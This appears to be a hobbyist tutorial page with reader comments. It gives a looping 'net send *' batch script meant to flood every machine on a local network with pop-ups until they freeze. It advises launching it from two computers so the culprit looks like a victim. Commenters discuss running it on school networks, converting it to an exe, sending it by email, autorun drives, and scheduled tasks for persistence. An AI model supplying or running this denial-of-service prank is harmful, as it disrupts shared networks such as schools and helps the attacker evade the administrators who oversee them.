This mass freezing will work by having one or more "host" computers send hundreds of thousands of pop-up messages to everyone in the network. Every time you try to click on something, more pop-ups have gotten in the way, soon freezing the computer. When all of the computers are shut off and rebooted, it starts all over!
Have fun!
Remove these ads by
Signing UpStep 1: Write the Script
@echo off
:start
net send * messagehere
goto start
What this will do is send a pop-up message to all of the computers in your network, and then loop back and do it again. It will go as fast as possible, taking up all of the CPU usage. That way, no one could stop the program (as that takes up CPU) without turning off the machine. As all of the network's computers are going ballistic with pop-ups, no one will know which one is causing it (especially if you launch this from two computers in the network, as they would both be causes but look like victims).




































Visit Our Store »
Go Pro Today »




I noticed that there are no instructables on how to make a network instant messenger. (It's easy to find how with VB 6, with the Winsock, but there is nothing on Instructables or Youtube on the subject with the only available one, VB 2008.)
Is anyone interested?
then netsend it to that.
I wrote really complicated batch files before. like they could auto-update from a server (on the network) and other stuff.
you can also find the current username using echo %username%
then you could put that into a file: echo %username% > username
(and no, I do not believe in file extensions)
*digs out old paper with hand written batch file*
and you can get user input with set /p varname= prompt:
then echo that with echo %varname%
also, get wget for windows. wget is awesome
My first thought of what to put on the drive was an autorun file and a VBS or Batch file. ;)
novell reimaging:
try holding F12 while booting the computer, then if is says something about vmlinux, hold Ctrl and Alt until theres a pretty blue screen
also, respect the admins, we have to deal with people stealing RAM, hauling computers upstairs, cleaning dust out, sorting through thousands of files (like, we actually try to find these things...), and dealing with *gasp* budget cuts
Thanks,
Sam
You aren't supposed to send batch files, but you technically can... yahoo supports it. Remember though that you would have to send it with yahoo and have it be recieved with yahoo. Outlook also causes problems.
What you can also do is try converting it into an exe. You can do this with software, or if you know how to program with C, you can easily do this manually.
You could also try writing a vbs version. This also is very easy.
The answer is yes!
Just ask if you have any more questions.
I could get you source code you can compile in microsoft visual c++, though
It depends therefore on if the computer is traceable to you, and if so, how competent security is in your situation.
and @ Knx_mepalm respect! xD.. a million computers man.. damn!;p..
i will c if i will use it once too ;) the problem is, everyone is on laptops (with vista or higher). That leaves me 2 questions:
1. Can i run the file on a XP virtual pc?
2. How big is the chance that laptops on the school network have the net send enabled?
Thanks man! keep up posting things like this! These articles are the reason i signed up for on this forum!
greetz
1.) Allowed to computers other than your real machine. Sometimes I saw that defaults tried to isolate the virtual machine.
2.) The virtual machine must be attached to the network : bridged, not NAT, with your network. Im using VMware, and this can be set under the virtual machine's settings. ( or just set it as such when you make the machine) Sorry for the delay in answering. Instructables stopped emailing me when I get comments. (This is really the same as number one)
2.) On a school network I would simply check. If one has it, hen chances are the rest will have it. The easiest way to check is to open cmd and type
net send /?
If an error message comes up saying that "net send" is not a valid command, then it's not there. If the syntax comes up, then it is enabled.
I hope this helps. If you have any more questions, please ask.
schtasks /create /tn "Name Here" /tr directory here /sc onlogon /sd start date here
eg
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc onlogon /sd 03/15/2001
LOL, but it was pretty funny seeing everyone freaking out that their computers wouldn't work. But we had to do a whole network reboot because it created a lot of overhead network interference.
We have since stopped and removed the messenger service from all our computers :)